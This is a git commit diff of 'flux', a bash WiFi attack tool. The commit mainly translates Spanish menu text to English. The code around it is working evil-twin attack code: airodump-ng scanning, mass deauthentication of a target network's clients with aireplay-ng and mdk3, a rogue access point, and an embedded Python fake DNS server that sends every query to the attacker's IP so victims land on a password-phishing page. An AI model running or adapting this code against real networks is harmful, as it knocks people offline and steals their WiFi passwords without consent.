Update flux

This commit is contained in:
William Todt 2016-02-26 17:06:38 +04:00
parent 4b6992ee9d
commit 592e2cda88
1 changed files with 34 additions and 35 deletions

69
flux
View File

@ -97,7 +97,7 @@ trap exitmode SIGINT SIGHUP
# KILL ALL # KILL ALL
function exitmode { function exitmode {
echo -e "\n\n"$white"["$red" "$white"] "$red"Ejecutando la limpieza y cerrando."$transparent"" echo -e "\n\n"$white"["$red" "$white"] "$red"Cleaning and closing"$transparent""
if ps -A | grep -q aireplay-ng; then if ps -A | grep -q aireplay-ng; then
echo -e ""$white"["$red"-"$white"] "$white"Matando "$grey"aireplay-ng"$transparent"" echo -e ""$white"["$red"-"$white"] "$white"Matando "$grey"aireplay-ng"$transparent""
@ -176,13 +176,13 @@ function exitmode {
# Genera listado de Interfaces en el Script # Genera listado de Interfaces en el Script
readarray -t webinterfaces < <(echo -e "Web Interface readarray -t webinterfaces < <(echo -e "Web Interface
\e[1;31mSalir"$transparent"" \e[1;31mExit"$transparent""
) )
# Genera listado de Idiomas web # Genera listado de Idiomas web
readarray -t webinterfaceslenguage < <(echo -e "Engish [ENG] readarray -t webinterfaceslenguage < <(echo -e "Engish [ENG]
Spanish[ESP] GERMAN [GER] Spanish[ESP] GERMAN [GER]
\e[1;31mAtras"$transparent"" \e[1;31mBack"$transparent""
) )
#Language for Web Interface #Language for Web Interface
@ -252,7 +252,7 @@ function mostrarheader(){
conditional_clear conditional_clear
echo -e "$green #########################################################" echo -e "$green #########################################################"
echo -e "$green # #" echo -e "$green # #"
echo -e "$green #$red FLUX $version" "${yellow}by ""${blue}deltax""$green #" echo -e "$green #$red FLUX $version" "${yellow}by ""${blue}deltax""$green #"${blue}
echo -e "$green #""${red} F""${yellow}lux" "${red}I""${yellow}s" "${red}N""${yellow}ot a ""${red}S""${yellow}ocial ""${red}E""${yellow}nginering" "${red}T""${yellow}ool""$green #" echo -e "$green #""${red} F""${yellow}lux" "${red}I""${yellow}s" "${red}N""${yellow}ot a ""${red}S""${yellow}ocial ""${red}E""${yellow}nginering" "${red}T""${yellow}ool""$green #"
echo -e "$green # #" echo -e "$green # #"
echo -e "$green #########################################################""$transparent" echo -e "$green #########################################################""$transparent"
@ -510,9 +510,9 @@ function infoap {
echo "INFO WIFI" echo "INFO WIFI"
echo echo
echo -e " "$green "SSID"$transparent" = $Host_SSID / $Host_ENC" echo -e " "$green "SSID"$transparent" = $Host_SSID / $Host_ENC"
echo -e " "$green "Canal"$transparent" = $channel" echo -e " "$green "Channel"$transparent" = $channel"
echo -e " "$green "Velocidad"$transparent" = ${speed:2} Mbps" echo -e " "$green "Speed"$transparent" = ${speed:2} Mbps"
echo -e " "$green "MAC del AP"$transparent" = $mac (\e[1;33m$Host_MAC_MODEL"$transparent")" echo -e " "$green "BSSID"$transparent" = $mac (\e[1;33m$Host_MAC_MODEL"$transparent")"
echo echo
} }
@ -732,7 +732,7 @@ function Scanchan {
conditional_clear conditional_clear
rm -rf $DUMP_PATH/dump* rm -rf $DUMP_PATH/dump*
xterm $HOLD -title "Scanning Target --> $channel_number" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e airodump-ng -w $DUMP_PATH/dump --channel "$channel_number" -a $WIFI_MONITOR xterm $HOLD -title "Scanning Target [$channel_number]" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e airodump-ng -w $DUMP_PATH/dump --channel "$channel_number" -a $WIFI_MONITOR
} }
# Scans the entire network # Scans the entire network
@ -832,7 +832,7 @@ function askAP {
infoap infoap
echo "MODO DE FakeAP" echo "MODE FakeAP"
echo " " echo " "
echo -e " "$green "1)"$transparent" Hostapd ("$red"Recomendado"$transparent")" echo -e " "$green "1)"$transparent" Hostapd ("$red"Recomendado"$transparent")"
echo -e " "$green "2)"$transparent" airbase-ng (Conexion mas lenta)" echo -e " "$green "2)"$transparent" airbase-ng (Conexion mas lenta)"
@ -862,8 +862,7 @@ function askauth {
echo "METHOD TO VERIFICATION THE PASSWORD" echo "METHOD TO VERIFICATION THE PASSWORD"
echo " " echo " "
echo -e " "$green "1)"$transparent" Handshake ("$red"Recommended"$transparent")" echo -e " "$green "1)"$transparent" Handshake ("$red"Recommended"$transparent")"
echo -e " "$green "2)"$transparent" Wpa_supplicant(Less effective / echo -e " "$green "2)"$transparent" Wpa_supplicant(More failures)"
More failures)"
echo -e " "$green "3)"$transparent" Back" echo -e " "$green "3)"$transparent" Back"
echo " " echo " "
echo -n " #> " echo -n " #> "
@ -887,7 +886,7 @@ function handshakelocation {
mostrarheader mostrarheader
infoap infoap
echo echo
echo -e "Introduzca la ruta del handshake que desea auditar (Ej: $red/root/micaptura.cap$transparent)" echo -e "handshake path (Ej: $red/root/micaptura.cap$transparent)"
echo -e "Press ${yellow}ENTER$transparent to skip" echo -e "Press ${yellow}ENTER$transparent to skip"
echo echo
echo -n "Path: " echo -n "Path: "
@ -958,7 +957,7 @@ function deauthforce {
mostrarheader mostrarheader
while true; do while true; do
echo "TIPO DE COMPROBACION DEL HANDSHAKE" echo "handshake check"
echo " " echo " "
echo -e " "$green "1)"$transparent" aircrack-ng (Posibilidades de fallo)" echo -e " "$green "1)"$transparent" aircrack-ng (Posibilidades de fallo)"
echo -e " "$green "2)"$transparent" pyrit" echo -e " "$green "2)"$transparent" pyrit"
@ -1066,7 +1065,7 @@ function deauth {
function deauthMENU { function deauthMENU {
Handshake_statuscheck="${grey}Sin handshake$transparent" Handshake_statuscheck="${grey}No handshake$transparent"
while true; do while true; do
conditional_clear conditional_clear
@ -1074,10 +1073,10 @@ function deauthMENU {
echo "*Capture Handshake* " echo "*Capture Handshake* "
echo echo
echo -e "Estado del handshake: $Handshake_statuscheck" echo -e "Status handshake: $Handshake_statuscheck"
echo echo
echo -e " "$green "1)"$transparent" Yes" echo -e " "$green "1)"$transparent" Yes"
echo -e " "$green "2)"$transparent" No " echo -e " "$green "2)"$transparent" Deauth all "
echo -e " "$green "3)"$transparent" No (Select another attack)" echo -e " "$green "3)"$transparent" No (Select another attack)"
echo -e " "$green "4)"$transparent" Select another network" echo -e " "$green "4)"$transparent" Select another network"
echo -e " "$green "5)"$transparent" Exit" echo -e " "$green "5)"$transparent" Exit"
@ -1118,7 +1117,7 @@ function checkhandshake {
webinterface webinterface
break break
else else
Handshake_statuscheck="${red}Malo$transparent" Handshake_statuscheck="${red}Error$transparent"
fi fi
elif [ "$handshakemode" = "hard" ]; then elif [ "$handshakemode" = "hard" ]; then
cp $DUMP_PATH/$Host_MAC-01.cap $DUMP_PATH/test.cap &>$flux_output_device cp $DUMP_PATH/$Host_MAC-01.cap $DUMP_PATH/test.cap &>$flux_output_device
@ -1129,9 +1128,9 @@ function checkhandshake {
break break
else else
if aircrack-ng $DUMP_PATH/$Host_MAC-01.cap | grep -q "1 handshake"; then if aircrack-ng $DUMP_PATH/$Host_MAC-01.cap | grep -q "1 handshake"; then
Handshake_statuscheck="${yellow}Corrupto$transparent" Handshake_statuscheck="${yellow}Corrupt$transparent"
else else
Handshake_statuscheck="${red}Malo$transparent" Handshake_statuscheck="${red}Error$transparent"
fi fi
fi fi
@ -1157,11 +1156,11 @@ function webinterface {
infoap infoap
echo echo
echo "SELECCIONA LA INTERFACE WEB" echo "Select Web Interface"
echo echo
echo -e "$green ""1)"$transparent" Interface web neutra" echo -e "$green ""1)"$transparent" Web Interface"
echo -e "$green ""2)"$transparent" \e[1;31mSalir"$transparent"" echo -e "$green ""2)"$transparent" \e[1;31mExit"$transparent""
echo echo
echo -n "#? " echo -n "#? "
@ -1184,7 +1183,7 @@ function webinterface {
echo -e "$green ""4)"$transparent" French [FR]" echo -e "$green ""4)"$transparent" French [FR]"
echo -e "$green ""5)"$transparent" Portuguese [POR]" echo -e "$green ""5)"$transparent" Portuguese [POR]"
echo -e "$green ""6)"$transparent" German [GER]" echo -e "$green ""6)"$transparent" German [GER]"
echo -e "$green ""7)"$transparent" \e[1;31mAtras"$transparent"" echo -e "$green ""7)"$transparent" \e[1;31mBack"$transparent""
echo echo
echo -n "#? " echo -n "#? "
@ -1412,8 +1411,8 @@ class DNSQuery:
self.data=data self.data=data
self.dominio='' self.dominio=''
tipo = (ord(data[2]) >> 3) & 15 # 4bits de tipo de consulta tipo = (ord(data[2]) >> 3) & 15
if tipo == 0: # Standard query if tipo == 0:
ini=12 ini=12
lon=ord(data[ini]) lon=ord(data[ini])
while lon != 0: while lon != 0:
@ -1434,7 +1433,7 @@ class DNSQuery:
if __name__ == '__main__': if __name__ == '__main__':
ip='$IP' ip='$IP'
print 'FAKEDNS:: dom.query. 60 IN A %s' % ip print 'pyminifakeDNS:: dom.query. 60 IN A %s' % ip
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udps.bind(('',53)) udps.bind(('',53))
@ -1444,7 +1443,7 @@ if __name__ == '__main__':
data, addr = udps.recvfrom(1024) data, addr = udps.recvfrom(1024)
p=DNSQuery(data) p=DNSQuery(data)
udps.sendto(p.respuesta(ip), addr) udps.sendto(p.respuesta(ip), addr)
print "Answer:" %s -> %s' % (p.dominio, ip) print 'Request: %s -> %s' % (p.dominio, ip)
except KeyboardInterrupt: except KeyboardInterrupt:
print 'Finalizando' print 'Finalizando'
udps.close() udps.close()
@ -1519,9 +1518,9 @@ function attack {
killall aireplay-ng &> $flux_output_device killall aireplay-ng &> $flux_output_device
killall mdk3 &> $flux_output_device killall mdk3 &> $flux_output_device
echo "$(strings $DUMP_PATH/dump-02.csv | cut -d "," -f1,14 | grep -h "$Host_SSID" | cut -d "," -f1)" >$DUMP_PATH/mdk3.txt echo "$(strings $DUMP_PATH/dump-02.csv | cut -d "," -f1,14 | grep -h "$Host_SSID" | cut -d "," -f1)" >$DUMP_PATH/mdk3.txt
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautentificando con mdk3 a todos de $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN & xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauth all [mdk3] $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN &
xterm -hold $TOPRIGHT -title "Esperando la pass" -e $DUMP_PATH/handcheck & xterm -hold $TOPRIGHT -title "Wifi Information" -e $DUMP_PATH/handcheck &
conditional_clear conditional_clear
while true; do while true; do
@ -1623,15 +1622,15 @@ function handshakecheck {
echo echo
echo -e \" PUNTO DE ACCESO:\" echo -e \" PUNTO DE ACCESO:\"
echo -e \" Nombre..........: "$white"$Host_SSID"$transparent"\" echo -e \" Number..........: "$white"$Host_SSID"$transparent"\"
echo -e \" MAC.............: "$yellow"$Host_MAC"$transparent"\" echo -e \" MAC.............: "$yellow"$Host_MAC"$transparent"\"
echo -e \" Canal...........: "$white"$Host_CHAN"$transparent"\" echo -e \" Channel.........: "$white"$Host_CHAN"$transparent"\"
echo -e \" Fabricante......: "$green "$Host_MAC_MODEL"$transparent"\" echo -e \" Brand...........: "$green "$Host_MAC_MODEL"$transparent"\"
echo -e \" Tiempo activo...: "$grey"\$ih\$horas:\$im\$minutos:\$is\$segundos"$transparent"\" echo -e \" Operation time...: "$grey"\$ih\$horas:\$im\$minutos:\$is\$segundos"$transparent"\"
echo -e \" Intentos........: "$red"\$(cat $DUMP_PATH/hit.txt)"$transparent"\" echo -e \" Attempts........: "$red"\$(cat $DUMP_PATH/hit.txt)"$transparent"\"
echo -e \" Clientes........: "$blue"\$(cat $DUMP_PATH/clientes.txt | grep DHCPACK | sort| uniq | wc -l)"$transparent"\" echo -e \" Clientes........: "$blue"\$(cat $DUMP_PATH/clientes.txt | grep DHCPACK | sort| uniq | wc -l)"$transparent"\"
echo echo
echo -e \" CLIENTES ACTIVOS:\" echo -e \" CLIENTES ONLINE:\"
x=0 x=0
for cliente in \"\${CLIENTESDHCP[@]}\"; do for cliente in \"\${CLIENTESDHCP[@]}\"; do